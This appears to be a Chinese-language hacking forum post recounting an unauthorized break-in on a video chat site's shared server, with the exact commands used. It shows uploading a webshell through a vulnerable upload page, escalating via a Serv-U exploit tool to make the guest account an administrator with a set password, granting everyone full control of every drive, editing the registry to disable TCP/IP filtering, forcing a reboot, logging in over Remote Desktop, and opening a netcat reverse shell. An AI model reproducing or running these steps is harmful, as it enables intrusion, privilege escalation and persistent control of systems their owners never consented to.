<P align=center><STRONG>从上传webshell突破TCPIP筛选到3389登陆</STRONG></P><STRONG></STRONG><P align=left> 一:得到webshell<BR>今天晚上的一次小小测试,由于本人太菜,再高深的技术我也不会,只能这样了..........<BR>一切都已经过去了,没有办法补图了,希望能看的懂这个小帖子。<BR>今天有是无聊的一天,晚上实在无聊没有事情干,就到一个视频聊天站点看秀,嘿嘿~<BR>突然发现一个聊天室特别的火暴,人数已经有500人在里面了(满员了),刷了n次也没有进去..........更加郁闷了!:(<BR>想想反正也是没有事情做,测试一下主机安全做的怎么样吧,呵呵(太菜,说测试人家安全实在是抬高自己了)<BR>在cmd下ping了一下得到了对方的ip,然后登陆http://whois.webhosting.info/对方ip看看有没有其他的站点,哈,这下发了,上面有几十个站点,估计我还是能找到一个两个带漏洞的站点的`<BR>经过漫长的查找,终于找到一个动易带漏洞的页面_Soft.asp">http://www.xxxx.net/Upfile_Soft.asp,上传一个webshell(海阳2005正式版)先(怎么上传我就不罗嗦了,上传工具现在漫天飘了)。<BR><BR>二:成功提升权限建立用户<BR>拿到webshell后高高兴兴的登陆了,突然发现什么权限都没有,只能在自己的webshell所在的目录里面打转(c.d.e.f盘都浏览不了),连删除文件的权限都没有,郁闷呀........<BR>回到〖Server〗下看看主机开了什么服务吧,经过发现他开了终端服务和serv-u服务,哈,这下有搞头了^_^用superscan扫描了一下他的ip,果然通过banner看出他是用的serv-u,版本5.0。<BR>到〖Wscript.Shell〗下面试试看能执行cmd命令不能,输入net user后没有反映,再试通过Wscript.Shell能执行cmd命令不能,再次输入net user后执行返回了对方的user名单,哈哈,这下好了,能拿下了!!<BR>上传serv-u提升工具到D:\a004\tggtwe\****.com\UploadSoft目录下面,改名为:test.exe,然后回到〖Wscript.Shell〗下执行命令去了,嘿嘿,马上一只肥鸡就要到手了,高兴ing~<BR>通过Wscript.Shell执行cmd命令:<BR>D:\a004\tggtwe\****.com\UploadSoft\test.exe "net user guest /active:yes" #激活guest账号,我喜欢用这个账号<BR>D:\a004\tggtwe\****.com\UploadSoft\test.exe "net user guest lvhuana" #把guest账号的密码设定为lvhuana<BR>D:\a004\tggtwe\****.com\UploadSoft\test.exe "net localgroup administrators guest /add" #提升guest权限到admin权限<BR>好了,账号建立完毕,执行一下net localgroup administrators看看成功没,通过回显知道添加成功了。然后执行netstat -an后看到他开的终端端口是默认的3389,OK,连接试试~<BR><BR>三:解决TCP/IP筛选<BR>连接不上!?晕...........再拿出superscan来扫一下他的3389,根本扫不到........(开了防火墙!?靠,我的点真背.....)<BR>没有办法了,再次回到Wscript.Shell执行cmd命令:<BR>D:\a004\tggtwe\****.com\UploadSoft\test.exe "cacls.exe c: /e /t /g everyone:F" #把c盘设置为everyone可以浏览<BR>D:\a004\tggtwe\****.com\UploadSoft\test.exe "cacls.exe d: /e /t /g everyone:F" #把d盘设置为everyone可以浏览<BR>D:\a004\tggtwe\****.com\UploadSoft\test.exe "cacls.exe e: /e /t /g everyone:F" #把e盘设置为everyone可以浏览<BR>D:\a004\tggtwe\****.com\UploadSoft\test.exe "cacls.exe f: /e /t /g everyone:F" #把f盘设置为everyone可以浏览<BR>这下最少可以遍历整个硬盘了,我在硬盘里面到处的翻,找遍了也没有找到他的防火墙文件,这下心里有数了,肯定是他进行TCP/IP筛选了!(当然也有是内网做服务器的可能,具体大家自己可以根据ipconfig -all来判断)<BR>突破TCP/IP筛选我们可以更改他的注册表来实现,我们要做的就是导出他注册表的三处,更改后再导入就可以了,回到〖Wscript.Shell〗执行cmd命令:<BR>D:\a004\tggtwe\****.com\UploadSoft\test.exe "regedit -e D:\a004\tggtwe\****.com\UploadSoft\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip" #导出注册表里关于TCP/IP筛选的第一处<BR>D:\a004\tggtwe\****.com\UploadSoft\test.exe "regedit -e D:\a004\tggtwe\****.com\UploadSoft\2.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip" #导出注册表里关于TCP/IP筛选的第二处<BR>D:\a004\tggtwe\****.com\UploadSoft\test.exe "regedit -e D:\a004\tggtwe\****.com\UploadSoft\3.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip" #导出注册表里关于TCP/IP筛选的第三处<BR>然后回到〖Stream〗或〖FSO〗发现1.reg,2.reg,3.reg已经安静的躺在那里了,嘿嘿~<BR>把1.reg,2.reg,3.reg下载回来到自己的硬盘里面编辑一下,把关于TCP/IP筛选的几个地方改一下,首先打开1.reg找到"EnableSecurityFilters"=dword:00000001把最后面的数字1改成0后保存,然后更改2.reg,3.reg,更改方法一样,我就不再罗嗦了~<BR>然后我们把1.reg,2.reg,3.reg再上传回对方的机器里面(这里我们要选上覆盖模式,因为没有权限删除原来的1.reg,2.reg,3.reg),上传成功后再回到〖Wscript.Shell〗执行cmd命令:<BR>D:\a004\tggtwe\****.com\UploadSoft\test.exe "regedit -s D:\a004\tggtwe\****.com\UploadSoft\1.reg" #安静模式下把我们修改完的1.reg导入到他的注册表<BR>D:\a004\tggtwe\****.com\UploadSoft\test.exe "regedit -s D:\a004\tggtwe\****.com\UploadSoft\2.reg" #安静模式下把我们修改完的2.reg导入到他的注册表<BR>D:\a004\tggtwe\****.com\UploadSoft\test.exe "regedit -s D:\a004\tggtwe\****.com\UploadSoft\3.reg" #安静模式下把我们修改完的3.reg导入到他的注册表<BR>OK!导入后重新启动他的机器后在能解决TCP/IP筛选问题,再在〖Wscript.Shell〗执行cmd命令:<BR>D:\a004\tggtwe\****.com\UploadSoft\test.exe "iisreset /reboot /timeout:00" #利用他自身的iis服务来重新启动他的机器,/timeout:00这个参数是让他立即重新启动<BR>执行完后我们再用superscan已经扫不到他了,吼吼~已经重新启动了!<BR><BR>四:成功用终端登陆<BR>经过漫长的等待后(其实时间不长,只是我在这里已经等不及了,嘿嘿~),终于可以用superscan扫到他了,并且可以扫到他的3389端口了,哈哈,终于成功了,拿出终端登陆器顺利的用我刚才建立的user:guest,pass:lvhuana登陆上了!<BR><BR><BR><BR>1.用NC反弹得到一个shell<BR><BR>本机监听 NC -l -p 32<BR><BR>WEBSHELL运行:<BR><BR>x:\xxx\serv-u.exe "x:\xxx\nc.exe -e cmd.exe *.*.*.* port"<BR><BR>得到一个shell<BR><BR>2.CMD下导出注册表文件<BR>C:\>regedit -e x:\xxx\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Ser<BR>vices\Tcpip<BR><BR>C:\>regedit -e x:\xxx\2.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip<BR><BR>C:\>regedit -e x:\xxx\3.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip<BR><BR>修改各文件 EnableSecurityFilters 处<BR>将最后的1改为0<BR><BR>3.将注册表文件导入<BR>x:\xxx>regedit -s 1.reg<BR>x:\xxx>regedit -s 2.reg<BR>x:\xxx>regedit -s 3.reg<BR>-S 为无提示<BR><BR>重启命令 iisreset /reboot<BR><BR>完成TCP/IP筛选限制<BR></P> |
|